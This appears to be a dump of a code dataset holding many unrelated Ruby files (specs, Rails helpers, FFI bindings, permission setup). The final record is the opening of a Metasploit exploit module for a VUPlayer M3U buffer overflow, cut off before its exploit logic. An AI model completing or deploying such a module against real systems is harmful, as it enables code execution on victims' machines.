hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
261da42d2d3a1bb34fc097742633c1bd958bcf4e | 2,087 | require 'spec_helper'
describe SingaporeCPFCalculator::Year2015::SPR2FG::Age60To65ContributionCalculator do
subject(:calculator) {
described_class.new ordinary_wages: ordinary_wages,
additional_wages: additional_wages
}
let(:result) { calculator.calculate }
let(:additional_wages) { 0.0 }
describe "#calculate" do
context "when the total wages amounts to 0.00" do
let(:ordinary_wages) { 0.00 }
it { expect(result).to equal_cpf total: 0.00, employee: 0.00, employer: 0.00 }
end
context "when the total wages amounts to 50.00" do
let(:ordinary_wages) { 50.00 }
it { expect(result).to equal_cpf total: 0.00, employee: 0.00, employer: 0.00 }
end
context "when the total wages amounts to 50.01" do
let(:ordinary_wages) { 50.01 }
it { expect(result).to equal_cpf total: 4.00, employee: 0.00, employer: 4.00 }
end
context "when the total wages amounts to 500.00" do
let(:ordinary_wages) { 500.00 }
it { expect(result).to equal_cpf total: 43.00, employee: 0.00, employer: 43.00 }
end
context "when the total wages amounts to 500.01" do
let(:ordinary_wages) { 500.01 }
it { expect(result).to equal_cpf total: 43.00, employee: 0.00, employer: 43.00 }
end
context "when the total wages amounts to 749.99" do
let(:ordinary_wages) { 749.99 }
it { expect(result).to equal_cpf total: 120.00, employee: 56.00, employer: 64.00 }
end
context "when the total wages amounts to 750.00" do
let(:ordinary_wages) { 750.00 }
it { expect(result).to equal_cpf total: 120.00, employee: 56.00, employer: 64.00 }
end
context "when the total wages amounts to 5,000.00" do
let(:ordinary_wages) { 5_000.00 }
it { expect(result).to equal_cpf total: 800.00, employee: 375.00, employer: 425.00 }
end
context "when the total wages amounts to 10,000.00" do
let(:ordinary_wages) { 10_000.00 }
it { expect(result).to equal_cpf total: 800.00, employee: 375.00, employer: 425.00 }
end
end
end
| 32.609375 | 90 | 0.655486 |
ffaac854ede3d2c4504e8166cd56d8bf7215d711 | 587 | # DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#201. Bitwise AND of Numbers Range
#Given a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive.
#For example, given the range [5, 7], you should return 4.
#Credits:
#Special thanks to @amrsaqr for adding this problem and creating all test cases.
## @param {Integer} m
## @param {Integer} n
## @return {Integer}
#def range_bitwise_and(m, n)
#end
# Time Is Money | 34.529412 | 118 | 0.741056 |
03e1421dffc24fef60ea3e71244748ac3130859a | 489 | class TestLab
# Source Error Class
class SourceError < TestLabError; end
# Source Class
#
# @author Zachary Patten <zachary AT jovelabs DOT com>
class Source < ZTK::DSL::Base
# Associations and Attributes
belongs_to :labfile, :class_name => 'TestLab::Labfile'
def initialize(*args)
@ui = TestLab.ui
@ui.logger.info { "Loading Source '#{self.id}'" }
super(*args)
@ui.logger.info { "Source '#{self.id}' Loaded" }
end
end
end
| 20.375 | 64 | 0.625767 |
9179019cd6a67973001196fb6fc6d77fb4dba0a4 | 5,622 | # frozen_string_literal: true
require "spec_helper"
describe AuthHelper do
describe "button_based_providers" do
it 'returns all enabled providers from devise' do
allow(helper).to receive(:auth_providers) { [:twitter, :github] }
expect(helper.button_based_providers).to include(*[:twitter, :github])
end
it 'does not return ldap provider' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
expect(helper.button_based_providers).to include(:twitter)
end
it 'returns empty array' do
allow(helper).to receive(:auth_providers) { [] }
expect(helper.button_based_providers).to eq([])
end
end
describe "providers_for_base_controller" do
it 'returns all enabled providers from devise' do
allow(helper).to receive(:auth_providers) { [:twitter, :github] }
expect(helper.providers_for_base_controller).to include(*[:twitter, :github])
end
it 'excludes ldap providers' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
expect(helper.providers_for_base_controller).not_to include(:ldapmain)
end
end
describe "form_based_providers" do
it 'includes LDAP providers' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
expect(helper.form_based_providers).to eq %i(ldapmain)
end
it 'includes crowd provider' do
allow(helper).to receive(:auth_providers) { [:twitter, :crowd] }
expect(helper.form_based_providers).to eq %i(crowd)
end
end
describe 'form_based_auth_provider_has_active_class?' do
it 'selects main LDAP server' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapprimary, :ldapsecondary, :kerberos] }
expect(helper.form_based_auth_provider_has_active_class?(:twitter)).to be(false)
expect(helper.form_based_auth_provider_has_active_class?(:ldapprimary)).to be(true)
expect(helper.form_based_auth_provider_has_active_class?(:ldapsecondary)).to be(false)
expect(helper.form_based_auth_provider_has_active_class?(:kerberos)).to be(false)
end
end
describe 'any_form_based_providers_enabled?' do
before do
allow(Gitlab::Auth::LDAP::Config).to receive(:enabled?).and_return(true)
end
it 'detects form-based providers' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
expect(helper.any_form_based_providers_enabled?).to be(true)
end
it 'ignores ldap providers when ldap web sign in is disabled' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
allow(helper).to receive(:ldap_sign_in_enabled?).and_return(false)
expect(helper.any_form_based_providers_enabled?).to be(false)
end
end
describe 'enabled_button_based_providers' do
before do
allow(helper).to receive(:auth_providers) { [:twitter, :github, :google_oauth2] }
end
context 'all providers are enabled to sign in' do
it 'returns all the enabled providers from settings' do
expect(helper.enabled_button_based_providers).to include('twitter', 'github', 'google_oauth2')
end
it 'puts google and github in the beginning' do
expect(helper.enabled_button_based_providers.first).to eq('google_oauth2')
expect(helper.enabled_button_based_providers.second).to eq('github')
end
end
context 'GitHub OAuth sign in is disabled from application setting' do
it "doesn't return github as provider" do
stub_application_setting(
disabled_oauth_sign_in_sources: ['github']
)
expect(helper.enabled_button_based_providers).to include('twitter')
expect(helper.enabled_button_based_providers).not_to include('github')
end
end
end
describe 'button_based_providers_enabled?' do
before do
allow(helper).to receive(:auth_providers) { [:twitter, :github] }
end
context 'button based providers enabled' do
it 'returns true' do
expect(helper.button_based_providers_enabled?).to be true
end
end
context 'all the button based providers are disabled via application_setting' do
it 'returns false' do
stub_application_setting(
disabled_oauth_sign_in_sources: %w(github twitter)
)
expect(helper.button_based_providers_enabled?).to be false
end
end
end
describe '#link_provider_allowed?' do
let(:policy) { instance_double('IdentityProviderPolicy') }
let(:current_user) { instance_double('User') }
let(:provider) { double }
before do
allow(helper).to receive(:current_user).and_return(current_user)
allow(IdentityProviderPolicy).to receive(:new).with(current_user, provider).and_return(policy)
end
it 'delegates to identity provider policy' do
allow(policy).to receive(:can?).with(:link).and_return('policy_link_result')
expect(helper.link_provider_allowed?(provider)).to eq 'policy_link_result'
end
end
describe '#unlink_provider_allowed?' do
let(:policy) { instance_double('IdentityProviderPolicy') }
let(:current_user) { instance_double('User') }
let(:provider) { double }
before do
allow(helper).to receive(:current_user).and_return(current_user)
allow(IdentityProviderPolicy).to receive(:new).with(current_user, provider).and_return(policy)
end
it 'delegates to identity provider policy' do
allow(policy).to receive(:can?).with(:unlink).and_return('policy_unlink_result')
expect(helper.unlink_provider_allowed?(provider)).to eq 'policy_unlink_result'
end
end
end
| 35.582278 | 103 | 0.710423 |
1d21c8772c093fda7b2a0720fdcaa4121258663a | 290 | class PathwayImage < ActiveRecord::Base
has_attached_file :background, :styles => { :thumb => "80x80>" }, :default_url => "/images/:style/missing.png"
validates_attachment_content_type :background, :content_type => /\Aimage\/.*\Z/
has_many :pathway_maps, :foreign_key => 'xref'
end
| 36.25 | 112 | 0.717241 |
611cfa35abdb22697b97b436f76db239850cfef6 | 3,107 | # encoding: utf-8
require "logstash/namespace"
require "logstash/logging"
require_relative "file_reader"
require_relative "kibana_resource"
require_relative "kibana_base_resource"
module LogStash module Modules class KibanaConfig
include LogStash::Util::Loggable
ALLOWED_DIRECTORIES = ["search", "visualization"]
attr_reader :index_name
# We name it `modul` here because `module` has meaning in Ruby.
def initialize(modul, settings)
@directory = ::File.join(modul.directory, "kibana")
@name = modul.module_name
@settings = settings
@index_name = settings.fetch("dashboards.kibana_index", ".kibana")
end
def dashboards
# there can be more than one dashboard to load
filenames = FileReader.read_json(dynamic("dashboard"))
filenames.map do |filename|
KibanaResource.new(@index_name, "dashboard", dynamic("dashboard", filename))
end
end
def index_pattern
pattern_name = "#{@name}-*"
default_index_json = '{"defaultIndex": "#{pattern_name}"}'
default_index_content_id = @settings.fetch("index_pattern.kibana_version", "5.5.0")
[
KibanaResource.new(@index_name, "index-pattern", dynamic("index-pattern"),nil, pattern_name),
KibanaResource.new(@index_name, "config", nil, default_index_json, default_index_content_id)
]
end
def resources
list = index_pattern
dashboards.each do |board|
extract_panels_into(board, list)
end
list.concat(extract_saved_searches(list))
end
private
def dynamic(dynamic_folder, filename = @name)
::File.join(@directory, dynamic_folder, "#{filename}.json")
end
def extract_panels_into(dashboard, list)
list << dashboard
dash = FileReader.read_json(dashboard.content_path)
if !dash.is_a?(Hash)
logger.warn("Kibana dashboard JSON is not an Object", :module => @name)
return
end
panelsjson = dash["panelsJSON"]
if panelsjson.nil?
logger.info("No panelJSON key found in kibana dashboard", :module => @name)
return
end
begin
panels = LogStash::Json.load(panelsjson)
rescue => e
logger.error("JSON parse error when reading kibana panelsJSON", :module => @name)
return
end
panels.each do |panel|
panel_type = panel["type"]
if ALLOWED_DIRECTORIES.member?(panel_type)
list << KibanaResource.new(@index_name, panel_type, dynamic(panel_type, panel["id"]))
else
logger.warn("panelJSON contained unknown type", :type => panel_type)
end
end
def extract_saved_searches(list)
result = [] # must not add to list while iterating
list.each do |resource|
next unless resource.contains?("savedSearchId")
content = resource.content_as_object
next if content.nil?
saved_search = content["savedSearchId"]
next if saved_search.nil?
ss_resource = KibanaResource.new(@index_name, "search", dynamic("search", saved_search))
next if list.member?(ss_resource) || result.member?(ss_resource)
result << ss_resource
end
result
end
end
end end end
| 29.590476 | 99 | 0.68748 |
1d9b749273fe79cb1d64b8160fe43994a59484f0 | 12,362 | class ArchivesSpaceService
def self.create_system_user(username, name, password, hidden = false)
if User[:username => username].nil?
User.create_from_json(JSONModel(:user).from_hash(:username => username,
:name => name),
{
:source => "local",
:is_system_user => 1
}.merge(hidden ? {:is_hidden_user => 1} : {}))
DBAuth.set_password(username, password)
return true
end
false
end
def self.create_hidden_system_user(username, name, password)
self.create_system_user(username, name, password, true)
end
def self.create_group(group_code, description, users_to_add, permissions)
global_repo = Repository[:repo_code => Repository.GLOBAL]
RequestContext.open(:repo_id => global_repo.id) do
if Group[:group_code => group_code].nil?
created_group = Group.create_from_json(JSONModel(:group).from_hash(:group_code => group_code,
:description => description),
:is_system_user => 1)
users_to_add.each do |user|
created_group.add_user(User[:username => user])
end
permissions.each do |permission|
created_group.grant(permission)
end
return true
end
end
false
end
def self.set_up_base_permissions
if not Repository[:repo_code => Repository.GLOBAL]
Repository.create(:repo_code => Repository.GLOBAL,
:name => "Global repository",
:json_schema_version => JSONModel(:repository).schema_version,
:hidden => 1)
end
AgentSoftware.ensure_correctly_versioned_archivesspace_record
# Create the admin user
self.create_system_user(User.ADMIN_USERNAME, "Administrator", AppConfig[:default_admin_password])
self.create_group(Group.ADMIN_GROUP_CODE, "Administrators", [User.ADMIN_USERNAME], [])
## Standard permissions
Permission.define("system_config",
"The ability to manage system configuration options",
:level => "global")
Permission.define("administer_system",
"The ability to act as a system administrator",
:level => "global")
Permission.define("manage_users",
"The ability to manage user accounts while logged in",
:level => "global")
Permission.define("become_user",
"The ability to masquerade as another user",
:level => "global")
Permission.define("view_all_records",
"The ability to view any record in the system",
:level => "global",
:system => true)
Permission.define("create_repository",
"The ability to create new repositories",
:level => "global")
Permission.define("delete_repository",
"The ability to delete a repository",
:level => "global")
Permission.define("transfer_repository",
"The ability to transfer the contents of a repository",
:level => "repository")
Permission.define("index_system",
"The ability to read any record for indexing",
:level => "global",
:system => true)
Permission.define("manage_repository",
"The ability to manage a given repository",
:level => "repository")
Permission.define("update_accession_record",
"The ability to create and modify accessions records",
:level => "repository")
Permission.define("update_resource_record",
"The ability to create and modify resources records",
:level => "repository")
Permission.define("update_digital_object_record",
"The ability to create and modify digital objects records",
:level => "repository")
Permission.define("update_event_record",
"The ability to create and modify event records",
:level => "repository")
Permission.define("delete_event_record",
"The ability to delete event records",
:level => "repository")
Permission.define("suppress_archival_record",
"The ability to suppress the major archival record types: accessions/resources/digital objects/components/collection management/events",
:level => "repository")
Permission.define("transfer_archival_record",
"The ability to transfer records between different repositories",
:level => "repository")
Permission.define("delete_archival_record",
"The ability to delete the major archival record types: accessions/resources/digital objects/components/collection management/events",
:level => "repository")
Permission.define("view_suppressed",
"The ability to view suppressed records in a given repository",
:level => "repository")
Permission.define("view_repository",
"The ability to view a given repository",
:level => "repository")
Permission.define("update_classification_record",
"The ability to create and modify classification records",
:level => "repository")
Permission.define("delete_classification_record",
"The ability to delete classification records",
:level => "repository")
Permission.define("mediate_edits",
"Track concurrent updates to records",
:level => "global",
:system => true)
Permission.define("import_records",
"The ability to initiate an importer job",
:level => "repository")
Permission.define("cancel_importer_job",
"The ability to cancel a queued or running importer job",
:level => "repository")
# Updates and deletes to locations, subjects and agents are a bit funny: they're
# global objects, but users are granted permission to modify them by being
# associated with a group within a repository.
Permission.define("manage_subject_record",
"The ability to create, modify and delete a subject record",
:level => "repository")
Permission.define("update_subject_record",
"The ability to create and modify subject records",
:implied_by => 'manage_subject_record',
:level => "global")
Permission.define("manage_agent_record",
"The ability to create, modify and delete an agent record",
:level => "repository")
Permission.define("update_agent_record",
"The ability to create and modify agent records",
:implied_by => 'manage_agent_record',
:level => "global")
Permission.define("manage_vocabulary_record",
"The ability to create, modify and delete a vocabulary record",
:level => "repository")
Permission.define("update_vocabulary_record",
"The ability to create and modify vocabulary records",
:implied_by => 'manage_vocabulary_record',
:level => "global")
Permission.define("update_location_record",
"The ability to create and modify location records",
:implied_by => 'manage_repository',
:level => "global")
Permission.define("delete_agent_record",
"The ability to delete agent records",
:implied_by => 'manage_agent_record',
:level => "global")
Permission.define("delete_subject_record",
"The ability to delete subject records",
:implied_by => 'manage_subject_record',
:level => "global")
Permission.define("delete_vocabulary_record",
"The ability to delete vocabulary records",
:implied_by => 'delete_archival_record',
:level => "global")
# Merge permissions are special too. A user with merge_agents_and_subjects
# in any repository is granted merge_agent_record and merge_subject_record
Permission.define("merge_agents_and_subjects",
"The ability to merge agent/subject records",
:level => "repository")
Permission.define("merge_subject_record",
"The ability to merge subject records",
:implied_by => 'merge_agents_and_subjects',
:level => "global")
Permission.define("merge_agent_record",
"The ability to merge agent records",
:implied_by => 'merge_agents_and_subjects',
:level => "global")
Permission.define("merge_archival_record",
"The ability to merge archival records records",
:level => "repository")
Permission.define("manage_rde_templates",
"The ability to create and delete RDE templates",
:level => "repository")
Permission.define("update_container_record",
"The ability to create and update container records",
:level => "repository")
Permission.define("manage_container_record",
"The ability to delete and bulk update container records",
:level => "repository")
Permission.define("manage_container_profile_record",
"The ability to create, modify and delete a container profile record",
:level => "repository")
Permission.define("update_container_profile_record",
"The ability to create/update/delete container profile records",
:implied_by => 'manage_container_profile_record',
:level => "global")
Permission.define("manage_location_profile_record",
"The ability to create, modify and delete a location profile record",
:level => "repository")
Permission.define("update_location_profile_record",
"The ability to create/update/delete location profile records",
:implied_by => 'manage_location_profile_record',
:level => "global")
end
def self.create_search_user
self.create_hidden_system_user(User.SEARCH_USERNAME, "Search Indexer", AppConfig[:search_user_secret])
DBAuth.set_password(User.SEARCH_USERNAME, AppConfig[:search_user_secret])
self.create_group(Group.SEARCHINDEX_GROUP_CODE, "Search index", [User.SEARCH_USERNAME],
["view_repository", "view_suppressed", "view_all_records", "index_system"])
end
def self.create_public_user
self.create_hidden_system_user(User.PUBLIC_USERNAME, "Public Interface Anonymous", AppConfig[:search_user_secret])
DBAuth.set_password(User.PUBLIC_USERNAME, AppConfig[:public_user_secret])
self.create_group(Group.PUBLIC_GROUP_CODE, "Public Anonymous", [User.PUBLIC_USERNAME],
["view_repository", "view_all_records"])
end
def self.create_staff_user
self.create_hidden_system_user(User.STAFF_USERNAME, "Staff System User", AppConfig[:search_user_secret])
DBAuth.set_password(User.STAFF_USERNAME, AppConfig[:staff_user_secret])
self.create_group(Group.STAFF_GROUP_CODE, "Staff System Group", [User.STAFF_USERNAME],
["mediate_edits"])
end
set_up_base_permissions
create_search_user
create_public_user
create_staff_user
end
| 40.267101 | 158 | 0.583401 |
7ad8dd2c5f521916e73bcfa738daaf740e63719b | 129 | class ActiveRecordUser < ActiveRecord::Base
include Tenacity
belongs_to :active_record_organization, :autosave => true
end | 25.8 | 59 | 0.79845 |
28f1299fea7e3fb56eddd504178068de820e0544 | 613 | module ApplicationHelper
def angular_safe_link_to(path_method, path_args = {}, *args)
link_to(
angular_path_to(
public_send("#{path_method.to_s.gsub(/(_path)?$/, '_safe_path')}", path_args)
),
*args
) do
yield
end
end
def angular_path_to(path)
"##{path}"
end
def method_missing(method, *args)
Path::SafePath.new(self, method).call_missing(*args) || super
end
def respond_to?(method)
return true if Path::SafePath.new(self, method).does_respond_to?
super
end
def as_title(key)
key.split('_').map(&:camelize).join(' ')
end
end
| 20.433333 | 85 | 0.637847 |
1de01cdbf6adfd02e0ee9efe2c9e68930aaf2f56 | 2,464 | # Very low level interface to tidy
# This file must be lazy loaded!
class TidyFFI::LibTidy #:nodoc:
extend FFI::Library
LIB_NAME = 'tidy'.freeze
PATHS = Array([LIB_NAME] + Dir['/{opt,usr}/{,local/}lib{,64}/libtidy{,-*}.{dylib,so*}']).freeze
begin
ffi_lib(TidyFFI.library_path || PATHS)
rescue LoadError
raise TidyFFI::LibTidyNotInstalled, "didn't find tidy libs on your system. Please install tidy (http://tidy.sourceforge.net/)"
end
attach_function :tidyReleaseDate, [], :string
attach_function :tidyCreate, [], :pointer
attach_function :tidyRelease, [:pointer], :void
attach_function :tidyCleanAndRepair, [:pointer], :int
attach_function :tidyRunDiagnostics, [:pointer], :int
attach_function :tidyParseString, [:pointer, :string], :int
attach_function :tidySaveBuffer, [:pointer, :pointer], :int
attach_function :tidySetErrorBuffer, [:pointer, :pointer], :int
attach_function :tidyBufInit, [:pointer], :void
attach_function :tidyBufFree, [:pointer], :void
attach_function :tidyGetOptionByName, [:pointer, :string], :pointer
attach_function :tidyOptGetId, [:pointer], :int
attach_function :tidyOptSetValue, [:pointer, :int, :string], :int
# iterators
attach_function :tidyGetOptionList, [:pointer], :pointer
attach_function :tidyGetNextOption, [:pointer, :pointer], :pointer
attach_function :tidyOptGetName, [:pointer], :string
attach_function :tidyOptGetType, [:pointer], :int
attach_function :tidyOptGetDefault, [:pointer], :string
attach_function :tidyOptGetDefaultInt, [:pointer], :ulong
attach_function :tidyOptGetDefaultBool, [:pointer], :int
attach_function :tidyOptIsReadOnly, [:pointer], :int
attach_function :tidyOptGetPickList, [:pointer], :pointer
attach_function :tidyOptGetNextPick, [:pointer, :pointer], :string
#types
# /** Option data types
# */
# typedef enum
# {
# TidyString, /**< String */
# TidyInteger, /**< Integer or enumeration */
# TidyBoolean /**< Boolean flag */
# } TidyOptionType;
TIDY_OPTION_TYPE = [:string, :integer, :boolean].freeze
end
class TidyFFI::LibTidy::TidyBuf < FFI::Struct #:nodoc:
layout :bp, :string,
:size, :uint,
:allocated, :uint,
:next, :uint
end
class TidyFFI::LibTidy::TidyBufWithAllocator < FFI::Struct #:nodoc:
layout :allocator, :pointer,
:bp, :string,
:size, :uint,
:allocated, :uint,
:next, :uint
end
| 32 | 130 | 0.687906 |
aba2a61d03c06f61e6b96af1a321b66ff3ce1524 | 4,878 | # frozen_string_literal: true
require 'stronger_parameters/constraints'
module StrongerParameters
module ControllerSupport
module PermittedParameters
def self.included(klass)
klass.extend ClassMethods
klass.public_send :before_action, :permit_parameters
end
def self.sugar(value)
case value
when Array
ActionController::Parameters.array(*value.map { |v| sugar(v) })
when Hash
constraints = value.transform_values do |v|
sugar(v)
end
ActionController::Parameters.map(constraints)
else
value
end
end
DEFAULT_PERMITTED = {
controller: ActionController::Parameters.anything,
action: ActionController::Parameters.anything,
format: ActionController::Parameters.anything,
authenticity_token: ActionController::Parameters.string,
utf8: Parameters.string,
_method: Parameters.string,
commit: Parameters.string
}.freeze
module ClassMethods
def self.extended(base)
base.send :class_attribute, :log_unpermitted_parameters, instance_accessor: false
end
def log_invalid_parameters!
self.log_unpermitted_parameters = true
end
def permitted_parameters(action, permitted)
if permit_parameters[action] == :skip || permitted == :skip
permit_parameters[action] = permitted
else
action_permitted = (permit_parameters[action] ||= {})
action_permitted.deep_merge!(permitted)
end
end
def permitted_parameters_for(action)
unless for_action = permit_parameters[action]
# NOTE: there is no easy way to test this, so make sure to test with
# a real rails controller if you make changes.
message = "Action #{action} for #{self} does not have any permitted parameters"
message += " (#{instance_method(action).source_location.join(":")})" if method_defined?(action)
raise(KeyError, message)
end
return :skip if for_action == :skip
# FYI: we should be able to call sugar on the result of deep_merge, but it breaks tests
permit_parameters[:all].deep_merge(for_action).
transform_values { |v| PermittedParameters.sugar(v) }
end
private
def permit_parameters
@permit_parameters ||= if superclass.respond_to?(:permit_parameters, true)
superclass.send(:permit_parameters).deep_dup
else
{all: DEFAULT_PERMITTED.deep_dup}
end
end
end
private
def permit_parameters
action = params.fetch(:action).to_sym
permitted = self.class.permitted_parameters_for(action)
return if permitted == :skip
# TODO: invalid values should also be logged, but atm only invalid keys are
log_unpermitted = self.class.log_unpermitted_parameters
permitted_params = without_invalid_parameter_exceptions(log_unpermitted) { params.permit(permitted) }
unpermitted_keys = flat_keys(params) - flat_keys(permitted_params)
show_unpermitted_keys(unpermitted_keys, log_unpermitted)
return if log_unpermitted
params.send(:parameters).replace(permitted_params)
params.permit!
request.params.replace(permitted_params)
logged_params = request.send(:parameter_filter).filter(permitted_params) # Removing passwords, etc
Rails.logger.info(" Filtered Parameters: #{logged_params.inspect}")
end
def show_unpermitted_keys(unpermitted_keys, log_unpermitted)
return if unpermitted_keys.empty?
log_prefix = (log_unpermitted ? 'Found' : 'Removed')
message =
"#{log_prefix} restricted keys #{unpermitted_keys.inspect} from parameters according to permitted list"
if Rails.configuration.respond_to?(:stronger_parameters_violation_header)
header = Rails.configuration.stronger_parameters_violation_header
end
response.headers[header] = message if response && header
Rails.logger.info(" #{message}")
end
def without_invalid_parameter_exceptions(log)
if log
begin
old = ActionController::Parameters.action_on_invalid_parameters
ActionController::Parameters.action_on_invalid_parameters = :log
yield
ensure
ActionController::Parameters.action_on_invalid_parameters = old
end
else
yield
end
end
def flat_keys(hash)
hash = hash.send(:parameters) if hash.is_a?(ActionController::Parameters)
hash.flat_map { |k, v| v.is_a?(Hash) ? flat_keys(v).map { |x| "#{k}.#{x}" }.push(k) : k }
end
end
end
end
| 34.595745 | 113 | 0.650882 |
872ba4cd4003249e8ce8507307e27b97084d6c1a | 2,376 | module Ckeditor
module Rails
class Asset
attr_reader :name, :root
def initialize name = 'ckeditor', path = '../vendor/assets'
@name = name
@root = Ckeditor::Rails.root_path.join path
end
def image_files
path = root.join('images', name)
files = Dir.glob(path.join('plugins', '**', '*.{png,gif,jpg,svg}')).reject { |file|
invalid_plugin_file?(file)
}
files += Dir.glob(path.join('skins', '**', '*.{png,gif,jpg,svg}')).reject { |file|
invalid_skin_file?(file)
}
files
end
def javascript_files
path = root.join('javascripts', name)
files = Dir.glob(path.join('*.js'))
files += Dir.glob(path.join('lang', '*.js')).reject { |file|
invalid_lang_file?(file)
}
files += Dir.glob(path.join('plugins', '**', '*.{js,html}')).reject { |file|
invalid_plugin_file?(file) or invalid_lang_file?(file)
}
files
end
def stylesheet_files
path = root.join('stylesheets', name)
files = Dir.glob(path.join('*.css'))
files += Dir.glob(path.join('plugins', '**', '*.css')).reject { |file|
invalid_plugin_file?(file)
}
files += Dir.glob(path.join('skins', '**', '*.css')).reject { |file|
invalid_skin_file?(file)
}
files
end
def files
files = []
files += image_files
files += javascript_files
files += stylesheet_files
files
end
private
def languages
Ckeditor::Rails.assets_languages
end
def plugins
Ckeditor::Rails.assets_plugins
end
def skins
Ckeditor::Rails.assets_skins
end
def invalid_lang_file? file
return false if languages.nil?
return false unless file.include? '/lang/'
not languages.include? File.basename(file, '.*')
end
def invalid_plugin_file? file
return false if plugins.nil?
retrun false unless file.include? '/plugins/'
plugins.none? { |plugin| file.include? "/#{plugin}/" }
end
def invalid_skin_file? file
return false if skins.nil?
return false unless file.include? '/skins/'
skins.none? { |skin| file.include? "/#{skin}/" }
end
end
end
end
| 26.4 | 91 | 0.550926 |
91b9759b99684e2464bb1405243fbdea31748c55 | 729 | $:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "braavos/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "braavos"
s.version = Braavos::VERSION
s.authors = ["Fabiano Beselga"]
s.email = ["[email protected]"]
s.homepage = "TODO"
s.summary = "TODO: Summary of Braavos."
s.description = "TODO: Description of Braavos."
s.license = "MIT"
s.files = Dir["{app,config,db,lib}/**/*", "MIT-LICENSE", "Rakefile", "README.rdoc"]
s.test_files = Dir["spec/**/*"]
s.add_dependency "rails", "~> 4.2.3"
s.add_development_dependency "sqlite3"
s.add_development_dependency "rspec-rails"
end
| 29.16 | 85 | 0.650206 |
1844ac969e6285377f9bdbc4f218cd041b025298 | 4,920 | module RI
class ClassEntry
attr_reader :name
attr_reader :path_names
def initialize(path_name, name, in_class)
@path_names = [ path_name ]
@name = name
@in_class = in_class
@class_methods = []
@instance_methods = []
@inferior_classes = []
end
# We found this class in more tha one place, so add
# in the name from there.
def add_path(path)
@path_names << path
end
# read in our methods and any classes
# and modules in our namespace. Methods are
# stored in files called name-c|i.yaml,
# where the 'name' portion is the external
# form of the method name and the c|i is a class|instance
# flag
def load_from(dir)
Dir.foreach(dir) do |name|
next if name =~ /^\./
# convert from external to internal form, and
# extract the instance/class flag
if name =~ /^(.*?)-(c|i).yaml$/
external_name = $1
is_class_method = $2 == "c"
internal_name = RiWriter.external_to_internal(external_name)
list = is_class_method ? @class_methods : @instance_methods
path = File.join(dir, name)
list << MethodEntry.new(path, internal_name, is_class_method, self)
else
full_name = File.join(dir, name)
if File.directory?(full_name)
inf_class = @inferior_classes.find {|c| c.name == name }
if inf_class
inf_class.add_path(full_name)
else
inf_class = ClassEntry.new(full_name, name, self)
@inferior_classes << inf_class
end
inf_class.load_from(full_name)
end
end
end
end
# Return a list of any classes or modules that we contain
# that match a given string
def contained_modules_matching(name)
@inferior_classes.find_all {|c| c.name[name]}
end
def classes_and_modules
@inferior_classes
end
# Return an exact match to a particular name
def contained_class_named(name)
@inferior_classes.find {|c| c.name == name}
end
# return the list of local methods matching name
# We're split into two because we need distinct behavior
# when called from the _toplevel_
def methods_matching(name, is_class_method)
local_methods_matching(name, is_class_method)
end
# Find methods matching 'name' in ourselves and in
# any classes we contain
def recursively_find_methods_matching(name, is_class_method)
res = local_methods_matching(name, is_class_method)
@inferior_classes.each do |c|
res.concat(c.recursively_find_methods_matching(name, is_class_method))
end
res
end
# Return our full name
def full_name
res = @in_class.full_name
res << "::" unless res.empty?
res << @name
end
# Return a list of all out method names
def all_method_names
res = @class_methods.map {|m| m.full_name }
@instance_methods.each {|m| res << m.full_name}
res
end
private
# Return a list of all our methods matching a given string.
# Is +is_class_methods+ if 'nil', we don't care if the method
# is a class method or not, otherwise we only return
# those methods that match
def local_methods_matching(name, is_class_method)
list = case is_class_method
when nil then @class_methods + @instance_methods
when true then @class_methods
when false then @instance_methods
else fail "Unknown is_class_method: #{is_class_method.inspect}"
end
list.find_all {|m| m.name; m.name[name]}
end
end
# A TopLevelEntry is like a class entry, but when asked to search
# for methods searches all classes, not just itself
class TopLevelEntry < ClassEntry
def methods_matching(name, is_class_method)
res = recursively_find_methods_matching(name, is_class_method)
end
def full_name
""
end
def module_named(name)
end
end
class MethodEntry
attr_reader :name
attr_reader :path_name
def initialize(path_name, name, is_class_method, in_class)
@path_name = path_name
@name = name
@is_class_method = is_class_method
@in_class = in_class
end
def full_name
res = @in_class.full_name
unless res.empty?
if @is_class_method
res << "::"
else
res << "#"
end
end
res << @name
end
end
# We represent everything know about all 'ri' files
# accessible to this program
class RiCache
attr_reader :toplevel
def initialize(dirs)
# At the top level we have a dummy module holding the
# overall namespace
@toplevel = TopLevelEntry.new('', '::', nil)
dirs.each do |dir|
@toplevel.load_from(dir)
end
end
end
end
| 26.170213 | 78 | 0.627642 |
1afde0f7b0de2ebac26b097231950341b99286ac | 2,764 | ##
# $Id: vuplayer_m3u.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'VUPlayer M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in VUPlayer <= 2.49. When
the application is used to open a specially crafted m3u file, an buffer is overwritten allowing
for the execution of arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2006-6251' ],
[ 'OSVDB', '31710' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
